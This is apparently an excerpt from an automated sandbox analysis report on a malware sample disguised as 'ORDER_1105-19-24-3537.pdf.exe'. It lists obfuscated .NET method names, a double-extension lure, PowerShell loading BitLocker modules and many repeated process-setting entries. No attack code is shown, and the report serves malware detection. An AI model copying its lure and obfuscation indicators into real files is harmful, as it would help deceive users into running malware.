          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, hV8VdQHDnIixJ02WRE.csHigh entropy of concatenated method names: 'aEF7IJ0Js4', 'JBx7uMmi5U', 'jYt71h6kw5', 'zva7VJZm4O', 'mgE7fNuqTC', 'HIJ7YdmONU', 'dEk7HldQeT', 'Poq7oLHVuq', 'cur7S6RiAq', 'naJ7Ml2DVr'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, yv2f9FL45JjqXUr6VO.csHigh entropy of concatenated method names: 'k3DjOFaLMo', 'YC1jvxaa5q', 'p5ylgEjmLN', 'ynwle8AhHl', 'i31jMA7grd', 'DmxjnKU06g', 'rsMj3AGCnr', 'htujdsDDWQ', 'dmnjA9Gk7s', 'PD2jLsvhk9'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, KmBHChENhiSgkuxeS2.csHigh entropy of concatenated method names: 'JkDidk68eb', 'adFiA8PN3H', 'kb0iLAUuHn', 'z7FiGejwMb', 'GsqiNJPwS2', 'SDLirj531d', 'EOGimkupZE', 'GuviOlyXGO', 'xxniqRZ1VY', 'LV1ivnDeMq'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, YZbDlb7vK4yKDQgN1q.csHigh entropy of concatenated method names: 's4HjPT3IyW', 'BPsjcaRop4', 'ToString', 'h8xjayUD0t', 'gqYjiDFQmW', 'EQPj8tibWk', 'H2HjD1mndZ', 'Qifj6AHkjP', 'WEyjRpD3FW', 'IJCj23SQAV'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, bebPGV2fABcdBLP15e.csHigh entropy of concatenated method names: 'eeyl14EdYj', 'cy7lVaKqAe', 'xoklxVhVL3', 'YmPlf0eqJi', 'X8JldaiG18', 'q81lYp8YYr', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, zCjBI2ufvlK4pO1FgQ.csHigh entropy of concatenated method names: 'epX8B2CvAV', 'OJ68JmEOnf', 'gqH8IGmC16', 'liX8unIprL', 'e1k8wXTmi2', 'guq8sHRApb', 'fhf8jUVgMj', 'Qip8lrookC', 'm758ZpHAVu', 'zZj8bQobLv'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, piI8uUijJAV67QhTJy.csHigh entropy of concatenated method names: 'IxneR726yk', 'tJUe22nu4p', 'XvPePnuhgZ', 'yjHecqmcTi', 'r8YewQTIIf', 'iIcesUQT5K', 'NQDQ2oqmLJsyJiTdsk', 'IeAx0QutM7ghxx2nI2', 'IIIeeA8hmN', 'h1Ce0X7sbS'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, ntyPNQqd8Ald6834S8.csHigh entropy of concatenated method names: 'ToString', 'emasMgeoll', 'DqpsVd3l4i', 'jXvsxsRjhH', 'w7IsfxARFu', 'HrKsYbagbM', 'G6lsUPAnN4', 'XBfsHGdQYO', 'uO5soev7Mn', 'st4sXCPBA2'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, SA60ufIefZnjwEFT2L.csHigh entropy of concatenated method names: 'rMr0FjIhjH', 'fIF0aqOkbn', 'FZL0iaQ09b', 'SOq08Ej30y', 'NWY0DIMRoh', 'PMb06v3IP3', 'SMQ0R2OSwb', 'RV402juAxY', 'HHR0Wt0xfe', 'qmW0Pe4Mja'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, XWip28D7gglolbiE2v.csHigh entropy of concatenated method names: 'Dispose', 'PineqBepZG', 'EsHyVZAEcS', 'uLHpphO4kn', 'UbhevNpr7U', 'tkbezIY64x', 'ProcessDialogKey', 'PUQygLD8f1', 'oxMyeot8uZ', 'EdlyyDNjoe'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, mKpsgsS2vj7ffukRBS.csHigh entropy of concatenated method names: 'Y0c9TUHM3', 'P9OBqqTnc', 'FchJC0Hum', 'jk55kVhbd', 'DDFuqf6aP', 'BLJChjbFS', 'M9aXeV4VLI3oacsJo8', 'TtlPGAVnwVIjBACIhB', 'AqtlcGXGq', 'zP8bErRfQ'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, VtMItTd45MA9KvyFQT.csHigh entropy of concatenated method names: 'Ml2ZekJK2M', 'inDZ0mw8c9', 'G5tZEmYKUl', 'g1CZaayNYZ', 'K50Zi7KC9y', 'JscZD8il9I', 'DohZ6WXASx', 'BeslmmKUUg', 'y6GlOuvb27', 'Q21lqDdfmR'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, yiy2XDz6h38oNvimW6.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'TV3Z76gM84', 'EtAZwtmI9r', 'hpMZsGypTD', 'ldrZjp8EmP', 'VSfZl123nq', 'Jr3ZZgYILd', 'MMHZbPQVxC'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, nVkVrvrLmpG0BesAYv.csHigh entropy of concatenated method names: 'uRnDQP9i1f', 'lU9D5vtZgD', 'g8L8x2HJxd', 'PI58fUqb0t', 'Y328Y4p85u', 'LCJ8UgLnQv', 'V0o8HkLAZI', 'NhJ8oWwfLK', 'KiR8Xfq0r6', 'NeI8ScaKbb'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, EqACNKGBg9AHraHJpeU.csHigh entropy of concatenated method names: 'cckZhp9r4J', 'o76ZKrYu9O', 'L8qZ94fmFs', 'QXGZBF4Bvg', 'cMaZQtous2', 'ThkZJ6nN3k', 'T8HZ5DG2yp', 'he2ZIKIQ4d', 'wgZZuEgdvd', 'MnKZCWk9av'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, MetIWETZ3FJ0RYQ6Sa.csHigh entropy of concatenated method names: 'O6kRhRlTKd', 'isqRKAqFAD', 'rgkR90kCxU', 'XT3RBMKjlV', 'rtoRQOEDru', 'S9wRJQCC2U', 'rUJR51hhFd', 'fyFRIDfMhS', 'ymGRuL4fP8', 'dr2RCN1dkH'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, prL8SWk9Dhladmn3jx.csHigh entropy of concatenated method names: 'mQtRaZAmKD', 'hBaR84xuSD', 'vIwR61mvRi', 'GGd6vmile0', 'qlY6z3V7y1', 'asARggwnNL', 'CuCReDEEMy', 'kYlRyEIHJ6', 'IVTR0jLERc', 'FdrRE39LTW'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, HpKpUH9J6HYDOSdXaW.csHigh entropy of concatenated method names: 'ctO6FodrQa', 'ajb6iemSpA', 'wk36DwelHZ', 'bX16RfiskZ', 'RR8625DVNg', 'BFlDNk7qjN', 'byHDrF61Lr', 'ugHDmFtFuD', 'TLxDOHJGFa', 'qwxDqBIorQ'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, Eysj8lc6j6IKC6fI9m.csHigh entropy of concatenated method names: 'XXKlafTNpZ', 'wnmlixdZIL', 'Qcql8uA06S', 'ObhlDHIQsV', 'Kqtl6lor9E', 'gLDlRmSliM', 'Tall2qJLdf', 'I9jlW6IlJS', 'GpmlPGZnib', 'm75lcAyjm2'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, hr5cNPU7SxIpsd8e8K.csHigh entropy of concatenated method names: 'dXZwSm9iIG', 'aPgwnv0GC5', 'axnwdiYKQq', 'sqUwAXiy5H', 'ATVwVZB2t8', 'O7PwxZCFaO', 'yPZwftjv65', 'jbPwYlNaQB', 'vPgwUWC3uw', 'RoxwHMyrAl'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, hV8VdQHDnIixJ02WRE.csHigh entropy of concatenated method names: 'aEF7IJ0Js4', 'JBx7uMmi5U', 'jYt71h6kw5', 'zva7VJZm4O', 'mgE7fNuqTC', 'HIJ7YdmONU', 'dEk7HldQeT', 'Poq7oLHVuq', 'cur7S6RiAq', 'naJ7Ml2DVr'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, yv2f9FL45JjqXUr6VO.csHigh entropy of concatenated method names: 'k3DjOFaLMo', 'YC1jvxaa5q', 'p5ylgEjmLN', 'ynwle8AhHl', 'i31jMA7grd', 'DmxjnKU06g', 'rsMj3AGCnr', 'htujdsDDWQ', 'dmnjA9Gk7s', 'PD2jLsvhk9'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, KmBHChENhiSgkuxeS2.csHigh entropy of concatenated method names: 'JkDidk68eb', 'adFiA8PN3H', 'kb0iLAUuHn', 'z7FiGejwMb', 'GsqiNJPwS2', 'SDLirj531d', 'EOGimkupZE', 'GuviOlyXGO', 'xxniqRZ1VY', 'LV1ivnDeMq'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, YZbDlb7vK4yKDQgN1q.csHigh entropy of concatenated method names: 's4HjPT3IyW', 'BPsjcaRop4', 'ToString', 'h8xjayUD0t', 'gqYjiDFQmW', 'EQPj8tibWk', 'H2HjD1mndZ', 'Qifj6AHkjP', 'WEyjRpD3FW', 'IJCj23SQAV'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, bebPGV2fABcdBLP15e.csHigh entropy of concatenated method names: 'eeyl14EdYj', 'cy7lVaKqAe', 'xoklxVhVL3', 'YmPlf0eqJi', 'X8JldaiG18', 'q81lYp8YYr', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, zCjBI2ufvlK4pO1FgQ.csHigh entropy of concatenated method names: 'epX8B2CvAV', 'OJ68JmEOnf', 'gqH8IGmC16', 'liX8unIprL', 'e1k8wXTmi2', 'guq8sHRApb', 'fhf8jUVgMj', 'Qip8lrookC', 'm758ZpHAVu', 'zZj8bQobLv'

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: Possible double extension: pdf.exeStatic PE information: ORDER_1105-19-24-3537.pdf.exe
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
